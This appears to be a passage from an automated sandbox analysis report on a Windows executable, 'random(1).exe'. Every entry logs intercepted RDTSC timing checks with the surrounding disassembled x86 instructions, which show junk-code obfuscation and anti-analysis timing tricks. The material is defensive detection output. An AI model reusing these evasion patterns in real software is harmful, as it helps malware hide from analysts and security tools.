              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF6E5 second address: 10EF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF6EB second address: 10EF6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF84C second address: 10EF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF852 second address: 10EF87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F06D8B4D9D3h 0x0000000e jmp 00007F06D8B4D9CEh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF87B second address: 10EF881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF881 second address: 10EF887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF887 second address: 10EF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF88B second address: 10EF8AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F06D8B4D9D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10F465B second address: 10F4660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10F4660 second address: 10F4696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F06D8B4D9D9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FAA6D second address: 10FAA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F06D8518546h 0x0000000b jmp 00007F06D8518559h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FB1BF second address: 10FB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F06D8B4D9C6h 0x0000000c jp 00007F06D8B4D9C6h 0x00000012 jmp 00007F06D8B4D9D7h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FC591 second address: 10FC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FA455 second address: 10FA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FA45B second address: 10FA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jp 00007F06D8518546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11038D0 second address: 11038DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1110AF7 second address: 1110B12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F06D851855Dh 0x00000008 jmp 00007F06D8518551h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11106AC second address: 11106B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11106B1 second address: 11106C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8518546h 0x0000000a je 00007F06D8518546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1046E17 second address: 1046E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8B4D9D1h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1046E03 second address: 1046E17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F06D8518548h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F56 second address: 1113F6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F6D second address: 1113F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F75 second address: 1113F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B328 second address: 111B347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518559h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B347 second address: 111B355 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B355 second address: 111B35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F057 second address: 111F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F05D second address: 111F076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F06D8518546h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F076 second address: 111F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F07A second address: 111F07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 112131C second address: 1121328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1121328 second address: 1121337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1131059 second address: 113105F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113105F second address: 1131065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11311B7 second address: 11311DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11311DF second address: 11311EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F06D8518546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314ED second address: 11314F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314F1 second address: 11314F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314F5 second address: 113152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F06D8B4D9D2h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jns 00007F06D8B4D9C6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113152A second address: 113153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113153C second address: 113154E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F06D8B4D9E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1132194 second address: 1132198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113460C second address: 1134616 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1143BB8 second address: 1143BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F06D8518546h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115693E second address: 115694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115694C second address: 1156970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F06D8518559h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1156970 second address: 1156974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1156974 second address: 115697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11564F0 second address: 11564F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11564F4 second address: 115651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518559h 0x00000007 jo 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115651E second address: 1156527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B074 second address: 116B078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B32A second address: 116B32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B4DD second address: 116B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8518546h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B4E8 second address: 116B501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B987 second address: 116B98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B98B second address: 116B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BAF7 second address: 116BAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BAFF second address: 116BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b jmp 00007F06D8B4D9D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BB22 second address: 116BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BB28 second address: 116BB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11704A8 second address: 11704F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F06D8518548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jnp 00007F06D8518546h 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12482B69h], eax 0x00000030 call 00007F06D8518549h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jno 00007F06D8518546h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11704F6 second address: 11704FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 11704FC second address: 117052D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F06D8518550h 0x0000000f jnc 00007F06D8518548h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F06D8518550h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 117052D second address: 117053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 117053A second address: 1170541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1170541 second address: 1170571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 11707A7 second address: 117082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518553h 0x00000009 popad 0x0000000a jmp 00007F06D8518556h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D1BDBh] 0x00000019 push dword ptr [ebp+1246A6DCh] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F06D8518548h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c call 00007F06D8518549h 0x00000041 pushad 0x00000042 jmp 00007F06D8518556h 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007F06D8518546h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 117082C second address: 1170867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D5h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jc 00007F06D8B4D9C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jg 00007F06D8B4D9C6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1170867 second address: 1170871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1170871 second address: 1170875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 11739CD second address: 11739EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Ch 0x00000009 jc 00007F06D8518546h 0x0000000f popad 0x00000010 pop edx 0x00000011 jng 00007F06D851855Ah 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 11739EE second address: 11739F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 11739F4 second address: 11739FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 117555F second address: 1175563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70291 second address: 4D70295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70295 second address: 4D70299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70299 second address: 4D7029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7029F second address: 4D702EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D2h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b movsx edi, ax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov bl, cl 0x00000024 jmp 00007F06D8B4D9CDh 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, ax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D702EC second address: 4D702F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70320 second address: 4D70344 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70344 second address: 4D7034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7034A second address: 4D7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7034E second address: 4D703D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F06D8518559h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov eax, 55ED7F73h 0x00000018 call 00007F06D8518558h 0x0000001d movzx esi, bx 0x00000020 pop edi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F06D8518555h 0x0000002c sbb ch, 00000016h 0x0000002f jmp 00007F06D8518551h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov edx, eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D703D9 second address: 4D703EE instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9CBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7047C second address: 4D704FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D851854Fh 0x00000009 sub eax, 4A665E7Eh 0x0000000f jmp 00007F06D8518559h 0x00000014 popfd 0x00000015 mov dh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push F74EBB96h 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 push ecx 0x00000024 mov eax, edi 0x00000026 pop ebx 0x00000027 popad 0x00000028 add dword ptr [esp], 7D976092h 0x0000002f jmp 00007F06D8518558h 0x00000034 call 00007F074859C057h 0x00000039 push 74DF27D0h 0x0000003e push dword ptr fs:[00000000h] 0x00000045 mov eax, dword ptr [esp+10h] 0x00000049 mov dword ptr [esp+10h], ebp 0x0000004d lea ebp, dword ptr [esp+10h] 0x00000051 sub esp, eax 0x00000053 push ebx 0x00000054 push esi 0x00000055 push edi 0x00000056 mov eax, dword ptr [74E80140h] 0x0000005b xor dword ptr [ebp-04h], eax 0x0000005e xor eax, ebp 0x00000060 push eax 0x00000061 mov dword ptr [ebp-18h], esp 0x00000064 push dword ptr [ebp-08h] 0x00000067 mov eax, dword ptr [ebp-04h] 0x0000006a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000071 mov dword ptr [ebp-08h], eax 0x00000074 lea eax, dword ptr [ebp-10h] 0x00000077 mov dword ptr fs:[00000000h], eax 0x0000007d ret 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F06D8518557h 0x00000085 rdtsc
